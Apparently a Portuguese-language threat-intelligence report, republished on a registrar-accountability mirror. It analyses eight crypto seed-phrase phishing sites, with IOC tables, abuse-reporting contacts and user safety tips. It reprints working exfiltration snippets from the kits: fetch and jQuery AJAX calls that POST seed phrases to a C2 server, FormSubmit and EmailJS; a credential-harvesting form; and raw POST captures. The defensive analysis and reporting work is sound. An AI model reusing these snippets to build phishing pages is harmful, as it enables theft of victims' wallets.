Editorial mirrorBrand mentions redacted to public IDs. Hover to inspect. Everything else is theatre.How it works
THE ENABLERS REGISTRYRegistrar accountability archive
Archive LiveRead-only public record · No ads · No tracking
Case file folder with redacted documents and confidential investigation report.
CASE / PT BR / PHISHING ANATOMY

8 programas para roubar frases-semente submetidos à engenharia reversa

The Enablers Registry·Editorial mirror·/pt-br/phishing-anatomy

Public record copy. Brand names withheld, public accreditation numbers preserved. If the body below says “we”, that means the original publisher, not this mirror. TER only preserves, redacts, and re-contextualizes.

Anatomia do possibly phishing relacionado a criptomoedas:
8 Ataques Reais Analisados

Interceptamos tráfego de possibly phishing em tempo real, realizamos engenharia reversa em cinco programas de roubo de frases-semente e rastreamos os dados roubados até bots do [REDACTED], contas do EmailJS e back-ends de Possibly phishing-as-a-Service.

27 de março de 2026 Pesquisa THE ENABLERS REGISTRY 18 minutos de leitura
Análise detalhada de uma investigação de phishing envolvendo criptomoedas
A análise em tempo real do tráfego de possibly phishing interceptado revela toda a infraestrutura do ataque
8Sites analisados
7Métodos de exfiltração
1,824+Dados de acesso roubados
380+Marcas de carteiras
$0Custo do atacante

O que descobrimos

Todos os dias, milhares de usuários de criptomoedas perdem seus fundos para sites de possibly phishing que parecem idênticos aos serviços legítimos de carteiras. Mas o que acontece atrás de O botão falso “Connect Wallet”? Para onde vai, na verdade, sua frase-semente?

Interceptamos o tráfego HTTP em tempo real de cinco sites de possibly phishing ativos, baixamos seu código-fonte completo e rastreamos cada ponto de exfiltração de dados até seu destino final. Esta investigação revela toda a anatomia do crypto-possibly phishing moderno — desde os truques de engenharia social que levam você a digitar sua frase-semente até o bot do [REDACTED] que a envia ao invasor em tempo real.

Isenção de responsabilidade

Todas as frases-semente apresentadas neste artigo são dados de teste gerados aleatoriamente. Nenhuma informação de acesso real foi comprometida durante esta investigação. Todos os sites foram denunciados aos respectivos provedores de hospedagem e departamentos de combate a abusos.

O Padrão Universal de Ataque

Apesar das diferenças na identidade visual e nos back-ends, todos os 8 sites de possibly phishing seguem o exatamente o mesmo funil psicológico:

Página de destinoConstrução de confiança
Seletor de carteiras60–110+ logotipos
Mensagem falsa “Conectando...”Temporizador de 3 a 5 segundos
"Falha na conexão"Sempre dá errado
Entrada manualSemente / Chave / Armazenamento de chaves
ExfiltraçãoTG / E-mail / API

A observação fundamental: a animação “Conectando...” é sempre programado para falhar. No código-fonte do Site nº 4, encontramos const success = false — não há nenhuma tentativa de conexão com a carteira. Todo o fluxo existe exclusivamente para direcionar as vítimas ao formulário “Conectar manualmente”.

Cadeia de ataque de phishing com criptomoedas em seis etapas
A cadeia de ataque universal de seis etapas comum a todos os sites de possibly phishing que analisamos

Os 8 sites: análise detalhada

1
Protocolo da camada de rede
[REDACTED]
Ao vivoIANA #1910 PagesBot do [REDACTED] + EmailJS

Falsificação de identidade

Um “protocolo descentralizado” fictício para validação de carteiras. Utiliza tickers de preços em tempo real do CryptoCompare e links para exploradores de blockchain reais (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) para conferir credibilidade. A página inicial exibe mais de 100 logotipos de carteiras e um processo de “validação” em três etapas.

A cadeia dupla de exfiltração

O backend mais sofisticado dos cinco — todas as credenciais roubadas são enviadas por meio de dois canais independentes simultaneamente:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on [REDACTED]
  |      |
  |      +--> [REDACTED] Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

Conclusões da OSINT

IndicadorValor
E-mail de golpistaBestgrace309@gmail.com
Bot do [REDACTED]@DewdropsTG_bot (ID: 7567323692)
Destinatário do [REDACTED]@metatech2 (ID do chat: 7350941887)
Back-end[REDACTED]
Serviço EmailJSservice_d5qigxs / template_7bqxeaa
Domínio ocultolayerschain.in (proveniente da ofuscação de e-mail do CF)
Mensagens enviadas1.824+ (a partir do `message_id` do [REDACTED])
Idade do domínio2 dias (TLS: 25 de março de 2026)
Falha na OPSEC

O e-mail do invasor foi encontrado em um Comentário em JavaScript dentro config.js: // Bestgrace309@gmail.com. Eles se esqueceram de removê-lo antes da implantação. Além disso, o backend do relé do [REDACTED] é totalmente aberto — sem autenticação, sem limitação de taxa. Ao decodificar o IANA #1910 data-cfemail Além da ofuscação no HTML, também descobrimos um e-mail oculto: support@layerschain.in, conectando-se à infraestrutura de hospedagem da Índia e da África do Sul.

2
Migração do token AQLA
[REDACTED]
Ao vivoIANA #1910 PagesFormulários não estáticos

Falsificação de identidade

Uma reprodução perfeita, pixel por pixel, da realidade Aqualibre (AQLA) página de migração de tokens. O código HTML contém uma tag de metadados que revela a fonte: data-scrapbook-source="https://token.[REDACTED]/migration", com data de 19 de novembro de 2024.

A abordagem “zero código”

Esse invasor requer sem código do lado do servidor. O formulário envia os dados diretamente para Não estático — um backend de formulário legítimo para sites estáticos. Cada envio é encaminhado para o e-mail do golpista. O e-mail do atacante é nunca aparece no código-fonte.

<form action="https://forms.[REDACTED]/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Custo: $0

IANA #1910 Pages: gratuito. Formulários não estáticos: gratuito. Sem domínios adquiridos. Sem servidores alugados. Custo total da infraestrutura: zero dólares.

3
[REDACTED] Typosquat
[REDACTED]
Ao vivo IANA #1910 Pages Formulários não estáticos

Falsificação de identidade

O subdomínio contém "safpal" — um erro ortográfico deliberado de [REDACTED], uma carteira de hardware popular. O site se apresenta como “Blockchain Wallet Rectification”, com 26 categorias de notícias falsas. Utiliza o Typed.js para animar os nomes das cadeias (Ethereum, BSC, Polygon...) e um ticker do LiveCoinWatch para dar credibilidade.

O mesmo kit, o mesmo operador?

Utiliza o exatamente o mesmo modelo de possibly phishing como Local nº 2: idêntico connect.html, idêntico wallets.html com mais de 60 logotipos, no mesmo backend do Un-static (ID de formulário diferente — 6f1b82c3...da9943af). O fato de o kit ser idêntico sugere fortemente que um operador responsável por ambos os locais.

Erros no código: “Privay Policy” (falta um ‘c’), “seperated” (deveria ser “separated”), “Kestore” (falta um ‘y’). O campo de senha usa type="text" em vez de type="password".

4
Clone da Flare Network
[REDACTED]
Ao vivoIANA #1910 PagesEmailJS duplo (redundância)

Falsificação de identidade

Um clone quase perfeito do Rede Flare portal — uma blockchain EVM de Camada 1 de verdade, com os protocolos FTSO e Data Connector. Reproduz mais de 30 parceiros do ecossistema, a navegação e a identidade visual. Favicons carregados a partir de um domínio typosquat: [REDACTED] (falta um “n” em “mainnet”).

Redundância dupla do EmailJS

O único site que usa duas contas separadas do EmailJS simultaneamente para redundância contra remoções:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.[REDACTED]/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Assunto do e-mail para cada roubo: "New Wallet Details from Flare".

Esta é uma empresa que conta com financiamento

O HTML contém Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Proteção PPC do Lunio, e um Pixel do Twitter/X Ads. O invasor está executando publicidade paga para direcionar as vítimas ao site de possibly phishing e filtrar os cliques dos bots. Isso não é um hobby — é uma operação financiada, com análises e investimento em publicidade.

Site de phishing da Flare Network com EmailJS e publicidade paga
Site nº 4: anúncios pagos, rastreamento analítico e exfiltração dupla — a operação mais profissional
5
COIN NODE / Correção da carteira (PhaaS)
[REDACTED]
Backend inoperanteAPI PulseResolve (PhaaS)

Falsificação de identidade

Um serviço genérico de “COIN NODE” / “Wallet Fix” (sem marca específica). Direitos autorais “Wallet Fix 2022” — este modelo de kit tem pelo menos 4 anos. Imagens hospedadas em [REDACTED] (WordPress na AWS).

Possibly phishing como Serviço

A arquitetura de back-end mais preocupante: uma API multilocatária baseada em UUID:

POST https://api.[REDACTED]/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=[REDACTED]&type=phrase&phrase=buddy+surprise+vapor+river+...

Cada golpista recebe seu próprio endpoint UUID. Um operador central mantém a API, acompanha as campanhas e, possivelmente, fica com uma parte dos fundos roubados. Isso é roubo industrializado de criptomoedas — um modelo de “possibly phishing como serviço”.

Infraestrutura relacionada (praticamente inativa)

DomínioFunçãoStatus
[REDACTED]API de exfiltraçãoNXDOMAIN
[REDACTED]Hospedagem de faviconsNXDOMAIN
[REDACTED]Apresentador do LogoNXDOMAIN
[REDACTED]CDN de imagensEm produção (AWS)
Zombie Frontend

O backend está inoperante, mas o O front-end ainda está no ar on IANA #1910 Pages. Se o invasor fizer um novo registro [REDACTED], o site volta a funcionar imediatamente.

6
Central de Suporte + Recuperação do [REDACTED]
[REDACTED] & [REDACTED]-recovery.support
Ao vivoIANA #1910 Pages + ReplitAPI C2 personalizadaPreenchimento automático do BIP39

Falsificação de identidade

A operação em duas frentes: um “Centro de Suporte” genérico em [REDACTED] com 15 categorias de emissão falsas e 39 marcas de carteiras, além de um Clone da experiência de integração do [REDACTED] com precisão de pixel em [REDACTED]-recovery.support hospedado no Replit — incluindo seleção do modelo do dispositivo, configuração do PIN e uma tabela com a frase-semente de 24 palavras com autocompletar BIP39 de verdade.

Backend C2 do Anti-Scanner

A página de suporte da carteira envia os dados roubados para [REDACTED]/log — um servidor C2 personalizado com nginx/Ubuntu atrás do IANA #1910. O back-end desvia intencionalmente todas as solicitações GET (retorna o erro 522 – tempo limite esgotado), respondendo apenas a solicitações POST. Isso significa que os verificadores de URL, os rastreadores do Google Safe Browsing e os pesquisadores de segurança que enviam solicitações GET para o endpoint não veem nada — o C2 parece inativo.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.[REDACTED]",
  allowedWallets: ["[REDACTED]","solfare","[REDACTED]","[REDACTED]",
    "[REDACTED]","[REDACTED]","[REDACTED]","VARA Provisional License","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

O clone do [REDACTED] executa um backend Express.js separado no próprio Replit: POST /api/recovery-phrase coletando {deviceId, pin, phrase}. Ele retorna 400 {"error":"Invalid data provided"} em caso de entrada inválida — confirmando que o backend está em funcionamento e em constante validação dados roubados.

Conclusões da OSINT

IndicadorValor
Front-end (Carteira)[REDACTED]
Front-end ([REDACTED])[REDACTED]-recovery.support (34.111.179.208)
Backend C2 [REDACTED] → nginx/1.24.0 Ubuntu
IPs C2104.21.60.163 / 172.67.198.35 (IANA #1910)
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736
Secretário[REDACTED] ([REDACTED]-recovery.support)
Implantado9 de janeiro de 2026 (cabeçalho “Última modificação”)
Pilha de tecnologias React + Vite + Tailwind v4.1 + Framer Motion
Maior fidelidade à experiência do usuário

O pacote JS de 466 KB contém o lista completa de palavras do BIP39 para o preenchimento automático em tempo real, 67 referências a “frase-senha” e 39 a “mnemônico”. O clone do [REDACTED] conduz as vítimas pelo mesmo fluxo de integração de um dispositivo [REDACTED] original — a página de possibly phishing mais convincente de toda esta investigação. O apiKey O campo na configuração sugere um arquitetura PhaaS multilocatária.

7
Plataforma de lançamento descentralizada
[REDACTED]
Ao vivoIANA #1910 PagesFormSubmit.co

Falsificação de identidade

Uma “Plataforma de Lançamento Descentralizada” genérica com 21 categorias de iscas (Staking, Migração, KYC, Sorteio, Resgate de recompensas, Recuperação de ativos, Pré-venda, Cunhagem de NFTs, Contas bloqueadas...) e Mais de 70 marcas de carteiras — uma das listas de carteiras mais completas que encontramos. O erro ortográfico revelador “Sychronize” (faltando o ‘n’) denuncia a falsificação.

The FormSubmit Pipeline

Usos FormSubmit.co — um serviço legítimo de envio de formulários por e-mail. O hash do endpoint a2cf4131f1a5d39453c7c183df96f86f é o MD5 do endereço de e-mail do golpista. Realizamos um ataque de força bruta em centenas de padrões de e-mail no Gmail, Yahoo, Hotmail, ProtonMail, Yandex e [REDACTED]não foi encontrado nenhum resultado. O golpista usa um endereço de e-mail incomum ou gerado aleatoriamente.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

Conclusões da OSINT

IndicadorValor
Domínio[REDACTED]
Hash de envio de formulárioa2cf4131f1a5d39453c7c183df96f86f
ID da campanhaDAPP DESCENTRALIZADO
Kit FontAwesomebdc3291137 (kit nº 112310842, versão gratuita 6.7.2)
jQuery3.2.1 + 3.5.1 carregados simultaneamente
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (incompatibilidade)
Duas alças de transporte

Kit FontAwesome bdc3291137 — O FontAwesome consegue identificar o titular da conta associado a esse ID de kit. A tag da campanha DAPP DECENTRALIZED pode aparecer em outros sites de possibly phishing que utilizem o mesmo hash do FormSubmit. Após roubar a frase-semente, um código QR falso e código de referência aleatório de 7 caracteres são exibidas as seguintes mensagens: “Entre em contato com o administrador com seu código de referência exclusivo” — deixando as vítimas à espera, em vez de investigar o caso.

8
R2 Bucket + PHP no computador de casa
pub-519769e9eb634616b1746c2018641d56.r2.dev
MortoIANA #1910 R2PHP + DDNS

Falsificação de identidade

Desconhecido — tanto o front-end quanto o back-end estão fora do ar. Com base na estrutura da carga útil, tratava-se de um programa para roubar a frase-semente de uma carteira de criptomoedas. O Bucket público do IANA #1910 R2 (armazenamento de objetos, não o Pages) é um vetor de possibly phishing bem documentado com mais de 5.000 páginas maliciosas identificadas e um aumento de 61 vezes no tráfego relatado pela Netskope.

A configuração do “script kiddie”

O mais operação primitiva nesta coleção. As frases-semente são enviadas palavra por palavra para um script PHP em execução em um computador doméstico ou VPS por meio de um serviço gratuito de DNS dinâmico:

POST [REDACTED]/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

Conclusões da OSINT

IndicadorValor
Front-end pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE]
Back-end [REDACTED] [NXDOMAIN]
ID do balde R2519769e9eb634616b1746c2018641d56
Provedor de DDNS [REDACTED] / [REDACTED] (Cincinnati, OH)
DNS NSns10–[REDACTED]
Nome de usuáriomercifuljigga4real123
Nome de usuário no OSINT: mercifuljigga4real123

"Merciful" + "jigga" (apelido de Jay-Z) + "4real" + "123" — um apelido claramente pessoal que sugere afinidade com a cultura do hip-hop. Não encontrado em qualquer plataforma indexada: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch ou [REDACTED]. Provavelmente ativo no [REDACTED], no [REDACTED] ou em plataformas de jogos com esse nome ou variações semelhantes. O nome do arquivo fuc.php combina com o estilo irreverente da alça.

7 maneiras de roubar sua frase-semente

Comparação entre quatro métodos de exfiltração de dados por meio de phishing no mundo das criptomoedas
Sete arquiteturas distintas de exfiltração utilizadas nos oito sites de possibly phishing
MétodoLocaisComo funcionaVelocidadeCusto
Bot do [REDACTED]#1 O Express.js no [REDACTED] redireciona para a API do Bot. O golpista recebe uma mensagem direta instantânea com as credenciais. Em tempo real$0
EmailJS#1, #4 O JavaScript do lado do cliente envia diretamente para a API do EmailJS, que, por sua vez, encaminha a mensagem para o e-mail do golpista. ~1 min$0
Formulários não estáticos#2, #3 Formulário HTML padrão com envio do tipo POST para um serviço de formulários legítimo que encaminha os envios por e-mail. ~1 min$0
FormSubmit.co#7 jQuery AJAX para FormSubmit.co. Endereço de e-mail oculto por um hash MD5. Campanha marcada como “DAPP DECENTRALIZED”. ~1 min$0
API C2 personalizada#6 O [REDACTED] envia as solicitações para a API do nginx/Express, que está atrás do IANA #1910. Rejeita solicitações GET (522) para evitar scanners. Responde apenas ao POST. Em tempo real~$5/mês
PHP + DDNS#8 Script em PHP em um computador doméstico por meio de um serviço gratuito de DNS dinâmico ([REDACTED]). A frase-semente é enviada palavra por palavra. Em tempo real$0
API do PhaaS#5 API multilocatária baseada em UUID. Um operador central gerencia o back-end, enquanto os golpistas alugam endpoints. Em tempo realDesconhecido

7 sinais de alerta que revelam qualquer site de possibly phishing

Se você vir qualquer Se for o caso, feche a aba imediatamente:

1. A mensagem “Falha na conexão” é sempre falsa

As conexões com carteiras reais utilizam o protocolo WalletConnect ou extensões de navegador. Elas nunca exibem um erro do tipo “Falha na conexão” que solicite que você digite sua frase-semente.

2. 50–110+ logotipos de carteiras, um único destino

Cada ícone de carteira leva ao mesmo formulário. Um serviço de verdade integraria o SDK específico de cada carteira.

3. “Erro” após o envio

O falso “Erro 503” ou “Erro desconhecido” exibido após o envio é intencional. Seus dados já foram roubados — o erro serve para induzi-lo a tentar novamente com outra carteira.

4. Hospedado em .pages.dev

Todos os 5 sites abusam do plano gratuito do IANA #1910 Pages. Não é necessária verificação de identidade. Os casos de abuso para fins de possibly phishing no IANA #1910 Pages aumentaram 198% em 2025.

5. Três guias: Frase / Chave privada / Armazenamento de chaves

Nenhum serviço legítimo precisa dos três tipos de credenciais. Esse formulário com três abas é uma característica típica de um kit de possibly phishing.

6. Sem interação com a blockchain

Nenhum desses sites carrega ethers.js, web3.js, nem fazem chamadas RPC. São formulários HTML puros que fingem ser dApps.

7. Infraestrutura de custo zero

Hospedagem gratuita + serviços de formulários gratuitos + mensagens gratuitas = uma operação completa de possibly phishing por US$ 0. Se o site não tiver um domínio válido, desconfie.

Tabela completa do IOC

Para equipes de segurança, plataformas de inteligência contra ameaças e denunciantes de abusos:

Domínios e Infraestrutura

DomínioTipoStatus
[REDACTED]Interface de possibly phishingAo vivo
[REDACTED]Interface de possibly phishingAo vivo
[REDACTED]Interface de possibly phishingAo vivo
[REDACTED]Interface de possibly phishingAo vivo
[REDACTED]Interface de possibly phishingAo vivo
[REDACTED]Backend do relé TGAo vivo
[REDACTED]Ativos de typosquatDesconhecido
layerschain.inDomínio relacionadoDNS fora do ar
[REDACTED]Back-end do PhaaSNXDOMAIN
[REDACTED]Hospedagem de ativosNXDOMAIN
[REDACTED]Apresentador do LogoNXDOMAIN
[REDACTED]CDN de imagensEm produção (AWS)
[REDACTED]Interface de possibly phishingAo vivo
[REDACTED]-recovery.supportPossibly phishing no [REDACTED] (Replit)Ao vivo
[REDACTED]Back-end C2 (nginx/Ubuntu)Ao vivo
[REDACTED]Domínio raiz404
[REDACTED]Interface de possibly phishingAo vivo
pub-519769e9eb634616b1746c2018641d56.r2.devPossibly phishing (categoria R2)Offline
[REDACTED]Back-end em PHP (DDNS)NXDOMAIN

Contas e identificadores

TipoValorSite
E-mailBestgrace309@gmail.com#1
E-mail (oculto)support@layerschain.in#1
Bot do [REDACTED]@DewdropsTG_bot (7567323692)#1
Usuário do [REDACTED]@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
Formulário não estáticoc78173e2d991...94c3f76#2
Formulário não estático6f1b82c3ce55...da9943af#3
UUID do PhaaSa26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Instância de renderizaçãorndr-id: ed83576e-b1b3-4c82#1
Replit Verifya43d3852-5304-47af-a61b-f0f6f3912736#6
MD5 do envio do formulárioa2cf4131f1a5d39453c7c183df96f86f#7
Tag da campanhaDAPP DESCENTRALIZADO#7
Kit FontAwesomebdc3291137 (kit nº 112310842)#7
ID do balde R2519769e9eb634616b1746c2018641d56#8
Nome de usuário/DDNSmercifuljigga4real123#8

Onde denunciar casos de possibly phishing relacionado a criptomoedas

Onde denunciar sites de phishing relacionados a criptomoedas — remoções por múltiplos vetores
Visando simultaneamente serviços de hospedagem, serviços de back-end e plataformas de mensagens para obter a máxima velocidade de remoção
ServiçoO que relatarComo
IANA #19107 contas .pages.dev + 1 bucket R2abuse.IANA #1910.com
Google Safe BrowsingTodos os URLs de possibly phishingDenunciar possibly phishing
PhishTankTodas as URLs da lista de bloqueios da comunidade[REDACTED]
EmailJS3 contas com uso indevido (IDs de serviço acima)abuse@emailjs.com
Não estático2 pontos finais do formulárioEntre em contato pelo site [REDACTED]
[REDACTED]Back-end de retransmissão do [REDACTED]Exibir formulário de denúncia de abuso
[REDACTED]@DewdropsTG_bot + @metatech2[REDACTED].org/support
Google (Gmail)Bestgrace309@gmail.comDenúncia de abuso no Google
Twitter/XConta de publicidade promovendo o Site nº 4Denúncia de abuso de anúncios do X
FormSubmit.coHash a2cf4131... (n.º 7)Formulário de denúncia de abuso do FormSubmit
Replit[REDACTED]-recovery.support (#6)Denúncia de abuso no Replit
[REDACTED]Registrador do site [REDACTED]-recovery.supportAbuso no [REDACTED]
DNSExit[REDACTED]Abuso no site [REDACTED]
FontAwesomeKit bdc3291137 (n.º 7)Uso indevido do FontAwesome
ChainabuseTodas as campanhas de possibly phishing[REDACTED]

Como se proteger

A Regra de Ouro

Nenhum serviço legítimo jamais pedirá que você digite sua frase-semente em um site. As frases-semente só devem ser inseridas no software oficial da carteira durante a recuperação da carteira — nunca em sites de terceiros que ofereçam serviços de “validação”, “sincronização” ou “recuperação”.

Antes de conectar qualquer carteira:

  • Verifique se a URL corresponde ao domínio oficial. Verifique os detalhes do certificado SSL.
  • O WalletConnect original utiliza um código QR ou um link direto — nunca um formulário de frase-semente.
  • Se a “conexão falhar” e você for solicitado a inserir suas credenciais manualmente — trata-se de possibly phishing.
  • Verifique URLs suspeitos em PhishTank ou VirusTotal antes de interagir.
  • Use uma carteira de hardware — ela exige confirmação física para cada transação.
  • Salve os URLs oficiais nos favoritos. Nunca clique em links de anúncios, mensagens diretas ou redes sociais.

A Taxonomia do Crypto-Possibly phishing

Os ladrões de frases-semente são apenas uma categoria. Aqui está o panorama completo do possibly phishing em criptomoedas — iremos adicionar análises detalhadas sobre cada tipo.

Rouba-frases-semente
Páginas falsas da “Connect Wallet” que tentam induzir você a digitar sua frase de recuperação. O foco deste artigo: 5 exemplos reais analisados em detalhes.
Abordado acima
Sequestro de aprovação
dApps maliciosos que solicitam aprovações ilimitadas de tokens por meio do [REDACTED]. Uma vez aprovadas, o invasor esvazia sua carteira sem precisar da sua frase-semente.
Em breve
Possibly phishing no gelo (Permit2)
Aproveita as autorizações sem consumo de gás da EIP-2612. A vítima assina uma mensagem fora da cadeia que concede direitos de transferência de tokens — nenhuma aprovação na cadeia é visível até o momento da drenagem.
Em breve
Alegações falsas sobre airdrops
Airdrops de tokens falsos que exigem que você “resgate” por meio de um contrato inteligente malicioso. A transação de resgate, na verdade, transfere seus tokens reais para fora.
Em breve
Programas que se apropriam da área de transferência
Malware que monitora sua área de transferência e, sem que você perceba, substitui os endereços de carteira copiados pelo endereço do invasor antes de você colá-los.
Em breve
Pó + Envenenamento
Pequenas transações provenientes de endereços semelhantes contaminam seu histórico. A vítima copia o endereço falso do histórico de transações para sua próxima transferência.
Em breve

A Verdade Inconfortável

Custos para montar uma operação de possibly phishing envolvendo criptomoedas $0 e leva menos de 30 minutos. Hospedagem gratuita, serviços de formulários gratuitos, bots de mensagens gratuitos. O invasor por trás do Site nº 1 já obteve credenciais de Mais de 1.824 vítimas. O local nº 4 está em funcionamento publicidade paga em grande escala. Isso não é brincadeira de amador — é uma indústria. A única defesa é a conscientização.

Ajude-nos a reagir

O THE ENABLERS REGISTRY rastreia e denuncia sites de possibly phishing relacionados a criptomoedas em tempo real. Se você se deparar com um site suspeito, denuncie-o para nós — vamos investigar e trabalhar para que ele seja retirado do ar.

Investigações relacionadas

Investigação
O fim do [REDACTED]: a IANA #1479 mentiu para proteger um ladrão de M
Roubo de Monero que durou 10 anos. Três registradores estiveram envolvidos. A IANA #1479 inventou sete mentiras.
Análise aprofundada
Redes de drenagem de criptomoedas: infraestrutura exposta
Como as operações de “drainer-as-a-service” compartilham infraestrutura e operadores.
Painel à mostra
Painel de possibly phishing do [REDACTED]: acesso administrativo total
Acessamos o painel de administração de uma operação de possibly phishing da [REDACTED].
Infraestrutura
Infraestrutura de golpes exposta: back-ends compartilhados
Como as operações fraudulentas compartilham servidores, modelos e fluxos de pagamento.

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings